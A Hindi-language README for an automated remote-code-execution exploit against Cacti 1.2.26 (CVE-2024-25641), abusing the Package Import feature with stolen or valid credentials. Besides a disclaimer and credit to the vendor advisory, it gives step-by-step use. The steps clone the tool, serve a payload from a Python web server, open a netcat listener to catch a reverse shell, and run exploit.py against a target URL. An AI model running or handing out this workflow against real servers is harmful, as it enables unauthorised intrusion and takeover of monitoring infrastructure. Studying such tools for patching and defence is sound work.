
CVE-2024-25641 - RCE स्वचालित एक्सप्लॉइट - Cacti 1.2.26
CVE-2024-25641 के लिए पूर्णतः स्वचालित एक्सप्लॉइट। जब कोई उपयोगकर्ता प्रमाणित होता है, Cacti संस्करण 1.2.26 एक मनमाना फ़ाइल लेखन भेद्यता के प्रति संवेदनशील है, जिसका शोषण "Package Import" सुविधा के माध्यम से किया जा सकता है, यह "Import Templates" अनुमति वाले प्रमाणित उपयोगकर्ताओं को वेब सर्वर पर मनमाना PHP कोड निष्पादित करने की अनुमति देता है (RCE)।
इस PoC का श्रेय : https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88 (मैंने इसे केवल प्रवेश पाने के लिए स्वचालित किया है।)
यह टूल केवल शैक्षिक और परीक्षण उद्देश्यों के लिए है। इस टूल का लेखक इसके साथ किए गए किसी भी दुरुपयोग या अवैध गतिविधियों के लिए ज़िम्मेदार नहीं है। इस टूल का उपयोग केवल उन सिस्टमों पर करें जिनके मालिक आप हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध और अनैतिक है।
# Clone the repository
git clone https://github.com/thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26.git
cd CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26
# Setup Python web server
python -m http.server <PYTHON_WEB_SERVER_PORT>
# Setup netcat listener
nc -lvnp <LOCAL_PORT>
# Run the tool
pip install -r requirements.txt (if needed)
python exploit.py -L <LOCAL_IP> -lp <LOCAL_PORT> -wp <PYTHON_WEB_SERVER_PORT> -url <URL> -u <USER> -p <PASS>
आप यह भी देख सकते हैं: CVE-2024-25641 PoC